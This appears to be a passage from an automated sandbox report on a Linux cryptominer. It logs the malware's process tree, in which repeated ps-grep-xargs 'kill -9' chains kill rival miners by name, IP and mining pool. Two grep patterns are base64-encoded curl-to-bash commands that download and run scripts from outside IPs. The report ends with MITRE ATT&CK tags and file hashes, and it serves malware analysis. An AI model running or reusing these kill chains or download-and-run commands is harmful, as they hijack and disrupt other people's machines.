- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2184
- /bin/grep
  grep -v grep
  2⤵
  PID:2183
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2184
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2184
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2184
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2184
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2184
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2184
- /bin/ps
  ps aux
  2⤵
  PID:2182
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2191
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2190
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:2189
- /bin/grep
  grep -v grep
  2⤵
  PID:2188
- /bin/ps
  ps aux
  2⤵
  PID:2187
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2196
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2195
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2194
- /bin/grep
  grep -v grep
  2⤵
  PID:2193
- /bin/ps
  ps aux
  2⤵
  PID:2192
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2201
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2200
- /bin/grep
  grep gitee.com
  2⤵
  PID:2199
- /bin/grep
  grep -v grep
  2⤵
  PID:2198
- /bin/ps
  ps aux
  2⤵
  PID:2197
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2206
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2205
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2204
- /bin/grep
  grep -v grep
  2⤵
  PID:2203
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2202
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2211
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2210
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:2209
- /bin/grep
  grep -v grep
  2⤵
  PID:2208
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2207
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2216
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2215
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:2214
- /bin/grep
  grep -v grep
  2⤵
  PID:2213
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2212
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2221
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2220
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:2219
- /bin/grep
  grep -v grep
  2⤵
  PID:2218
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2217
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2226
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2225
- /bin/grep
  grep kthrotlds
  2⤵
  PID:2224
- /bin/grep
  grep -v grep
  2⤵
  PID:2223
- /bin/ps
  ps aux
  2⤵
  PID:2222
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2231
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2230
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:2229
- /bin/grep
  grep -v grep
  2⤵
  PID:2228
- /bin/ps
  ps aux
  2⤵
  PID:2227
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2236
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2235
- /bin/grep
  grep netdns
  2⤵
  PID:2234
- /bin/grep
  grep -v grep
  2⤵
  PID:2233
- /bin/ps
  ps aux
  2⤵
  PID:2232
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2241
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2240
- /bin/grep
  grep watchdogs
  2⤵
  PID:2239
- /bin/grep
  grep -v grep
  2⤵
  PID:2238
- /bin/ps
  ps aux
  2⤵
  PID:2237
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2253
- /bin/grep
  grep -v kdevtmpfsi
  2⤵
  PID:2250
- /bin/grep
  grep -v atd
  2⤵
  PID:2249
- /usr/bin/awk
  awk "\$3>80.0{print \$2}"
  2⤵
  PID:2252
- /bin/grep
  grep -v apache2
  2⤵
  PID:2248
- /bin/grep
  grep -v postgresq1
  2⤵
  PID:2251
- /bin/grep
  grep -v dblaunched
  2⤵
  PID:2247
- /bin/grep
  grep -v dblaunchs
  2⤵
  PID:2246
- /bin/grep
  grep -v dblaunch
  2⤵
  PID:2245
- /bin/grep
  grep -v root
  2⤵
  PID:2244
- /bin/grep
  grep -v grep
  2⤵
  PID:2243
- /bin/ps
  ps aux
  2⤵
  PID:2242
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2259
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2258
- /bin/grep
  grep " ps"
  2⤵
  PID:2257
- /bin/grep
  grep -v aux
  2⤵
  PID:2256
- /bin/grep
  grep -v grep
  2⤵
  PID:2255
- /bin/ps
  ps aux
  2⤵
  PID:2254
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2264
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2263
- /bin/grep
  grep sync_supers
  2⤵
  PID:2262
- /bin/grep
  grep -v grep
  2⤵
  PID:2261
- /bin/ps
  ps aux
  2⤵
  PID:2260
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2269
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2268
- /bin/grep
  grep cpuset
  2⤵
  PID:2267
- /bin/grep
  grep -v grep
  2⤵
  PID:2266
- /bin/ps
  ps aux
  2⤵
  PID:2265
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2275
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2274
- /bin/grep
  grep "x]"
  2⤵
  PID:2273
- /bin/grep
  grep -v aux
  2⤵
  PID:2272
- /bin/grep
  grep -v grep
  2⤵
  PID:2271
- /bin/ps
  ps aux
  2⤵
  PID:2270
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2281
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2280
- /bin/grep
  grep "sh] <"
  2⤵
  PID:2279
- /bin/grep
  grep -v aux
  2⤵
  PID:2278
- /bin/grep
  grep -v grep
  2⤵
  PID:2277
- /bin/ps
  ps aux
  2⤵
  PID:2276
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2287
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2286
- /bin/grep
  grep " \\[]"
  2⤵
  PID:2285
- /bin/grep
  grep -v aux
  2⤵
  PID:2284
- /bin/grep
  grep -v grep
  2⤵
  PID:2283
- /bin/ps
  ps aux
  2⤵
  PID:2282
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2292
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2291
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:2290
- /bin/grep
  grep -v grep
  2⤵
  PID:2289
- /bin/ps
  ps aux
  2⤵
  PID:2288
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2297
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2296
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:2295
- /bin/grep
  grep -v grep
  2⤵
  PID:2294
- /bin/ps
  ps aux
  2⤵
  PID:2293
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2302
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2301
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2300
- /bin/grep
  grep -v grep
  2⤵
  PID:2299
- /bin/ps
  ps aux
  2⤵
  PID:2298
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2307
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2306
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:2305
- /bin/grep
  grep -v grep
  2⤵
  PID:2304
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2303
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2312
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2311
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:2310
- /bin/grep
  grep -v grep
  2⤵
  PID:2309
- /bin/ps
  ps aux
  2⤵
  PID:2308
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2317
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2316
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:2315
- /bin/grep
  grep -v grep
  2⤵
  PID:2314
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2313
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2322
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2321
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:2320
- /bin/grep
  grep -v grep
  2⤵
  PID:2319
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2318
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2327
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2326
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:2325
- /bin/grep
  grep -v grep
  2⤵
  PID:2324
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2323
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2332
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2331
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:2330
- /bin/grep
  grep -v grep
  2⤵
  PID:2329
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2328
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2337
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2336
- /bin/grep
  grep sustse
  2⤵
  PID:2335
- /bin/grep
  grep -v grep
  2⤵
  PID:2334
- /bin/ps
  ps aux
  2⤵
  PID:2333
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2342
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2341
- /bin/grep
  grep sustse3
  2⤵
  PID:2340
- /bin/grep
  grep -v grep
  2⤵
  PID:2339
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2338
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2348
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2347
- /bin/grep
  grep wget
  2⤵
  PID:2346
- /bin/grep
  grep mr.sh
  2⤵
  PID:2345
- /bin/grep
  grep -v grep
  2⤵
  PID:2344
- /bin/ps
  ps aux
  2⤵
  PID:2343
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2354
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2353
- /bin/grep
  grep curl
  2⤵
  PID:2352
- /bin/grep
  grep mr.sh
  2⤵
  PID:2351
- /bin/grep
  grep -v grep
  2⤵
  PID:2350
- /bin/ps
  ps aux
  2⤵
  PID:2349
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2360
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2359
- /bin/grep
  grep wget
  2⤵
  PID:2358
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2357
- /bin/grep
  grep -v grep
  2⤵
  PID:2356
- /bin/ps
  ps aux
  2⤵
  PID:2355
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2366
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2365
- /bin/grep
  grep curl
  2⤵
  PID:2364
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2363
- /bin/grep
  grep -v grep
  2⤵
  PID:2362
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2361
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2372
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2371
- /bin/grep
  grep wget
  2⤵
  PID:2370
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2369
- /bin/grep
  grep -v grep
  2⤵
  PID:2368
- /bin/ps
  ps aux
  2⤵
  PID:2367
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2378
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2377
- /bin/grep
  grep curl
  2⤵
  PID:2376
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2375
- /bin/grep
  grep -v grep
  2⤵
  PID:2374
- /bin/ps
  ps aux
  2⤵
  PID:2373
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2384
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2383
- /bin/grep
  grep wget
  2⤵
  PID:2382
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2381
- /bin/grep
  grep -v grep
  2⤵
  PID:2380
- /bin/ps
  ps aux
  2⤵
  PID:2379
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2390
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2389
- /bin/grep
  grep curl
  2⤵
  PID:2388
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2387
- /bin/grep
  grep -v grep
  2⤵
  PID:2386
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2385
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2395
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2394
- /bin/grep
  grep j2.conf
  2⤵
  PID:2393
- /bin/grep
  grep -v grep
  2⤵
  PID:2392
- /bin/ps
  ps aux
  2⤵
  PID:2391
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2401
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2400
- /bin/grep
  grep wget
  2⤵
  PID:2399
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2398
- /bin/grep
  grep -v grep
  2⤵
  PID:2397
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2396
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2407
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2406
- /bin/grep
  grep curl
  2⤵
  PID:2405
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2404
- /bin/grep
  grep -v grep
  2⤵
  PID:2403
- /bin/ps
  ps aux
  2⤵
  PID:2402
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2413
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2412
- /bin/grep
  grep wget
  2⤵
  PID:2411
- /bin/grep
  grep ficov
  2⤵
  PID:2410
- /bin/grep
  grep -v grep
  2⤵
  PID:2409
- /bin/ps
  ps aux
  2⤵
  PID:2408
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2419
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2418
- /bin/grep
  grep curl
  2⤵
  PID:2417
- /bin/grep
  grep ficov
  2⤵
  PID:2416
- /bin/grep
  grep -v grep
  2⤵
  PID:2415
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2414
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2425
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2424
- /bin/grep
  grep wget
  2⤵
  PID:2423
- /bin/grep
  grep he.sh
  2⤵
  PID:2422
- /bin/grep
  grep -v grep
  2⤵
  PID:2421
- /bin/ps
  ps aux
  2⤵
  PID:2420
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2431
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2430
- /bin/grep
  grep curl
  2⤵
  PID:2429
- /bin/grep
  grep he.sh
  2⤵
  PID:2428
- /bin/grep
  grep -v grep
  2⤵
  PID:2427
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2426
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2437
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2436
- /bin/grep
  grep wget
  2⤵
  PID:2435
- /bin/grep
  grep miner.sh
  2⤵
  PID:2434
- /bin/grep
  grep -v grep
  2⤵
  PID:2433
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2432
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2443
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2442
- /bin/grep
  grep curl
  2⤵
  PID:2441
- /bin/grep
  grep miner.sh
  2⤵
  PID:2440
- /bin/grep
  grep -v grep
  2⤵
  PID:2439
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2438
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2449
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2448
- /bin/grep
  grep wget
  2⤵
  PID:2447
- /bin/grep
  grep nullcrew
  2⤵
  PID:2446
- /bin/grep
  grep -v grep
  2⤵
  PID:2445
- /bin/ps
  ps aux
  2⤵
  PID:2444
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2455
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2454
- /bin/grep
  grep curl
  2⤵
  PID:2453
- /bin/grep
  grep nullcrew
  2⤵
  PID:2452
- /bin/grep
  grep -v grep
  2⤵
  PID:2451
- /bin/ps
  ps aux
  2⤵
  PID:2450
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2460
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2459
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:2458
- /bin/grep
  grep -v grep
  2⤵
  PID:2457
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2456
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2465
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2464
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:2463
- /bin/grep
  grep -v grep
  2⤵
  PID:2462
- /bin/ps
  ps aux
  2⤵
  PID:2461
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2470
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2469
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:2468
- /bin/grep
  grep -v grep
  2⤵
  PID:2467
- /bin/ps
  ps aux
  2⤵
  PID:2466
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2475
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2474
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:2473
- /bin/grep
  grep -v grep
  2⤵
  PID:2472
- /bin/ps
  ps aux
  2⤵
  PID:2471
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2480
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2479
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:2478
- /bin/grep
  grep -v grep
  2⤵
  PID:2477
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2476
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2485
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2484
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2483
- /bin/grep
  grep -v grep
  2⤵
  PID:2482
- /bin/ps
  ps aux
  2⤵
  PID:2481
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2490
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2489
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:2488
- /bin/grep
  grep -v grep
  2⤵
  PID:2487
- /bin/ps
  ps auxf
  2⤵
  PID:2486
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2495
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2494
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:2493
- /bin/grep
  grep -v grep
  2⤵
  PID:2492
- /bin/ps
  ps auxf
  2⤵
  PID:2491
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2500
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2499
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  PID:2498
- /bin/grep
  grep -v grep
  2⤵
  PID:2497
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2496
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2505
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2504
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:2503
- /bin/grep
  grep -v grep
  2⤵
  PID:2502
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2501
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2510
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2509
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:2508
- /bin/grep
  grep -v grep
  2⤵
  PID:2507
- /bin/ps
  ps auxf
  2⤵
  PID:2506
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2515
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2514
- /bin/grep
  grep monerohash.com
  2⤵
  PID:2513
- /bin/grep
  grep -v grep
  2⤵
  PID:2512
- /bin/ps
  ps auxf
  2⤵
  PID:2511
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2520
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2519
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  PID:2518
- /bin/grep
  grep -v grep
  2⤵
  PID:2517
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2516
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2525
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2524
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:2523
- /bin/grep
  grep -v grep
  2⤵
  PID:2522
- /bin/ps
  ps auxf
  2⤵
  PID:2521
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2530
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2529
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:2528
- /bin/grep
  grep -v grep
  2⤵
  PID:2527
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2526
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2535
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2534
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:2533
- /bin/grep
  grep -v grep
  2⤵
  PID:2532
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2531
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2540
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2539
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:2538
- /bin/grep
  grep -v grep
  2⤵
  PID:2537
- /bin/ps
  ps auxf
  2⤵
  PID:2536
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2545
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2544
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:2543
- /bin/grep
  grep -v grep
  2⤵
  PID:2542
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2541
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2549

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit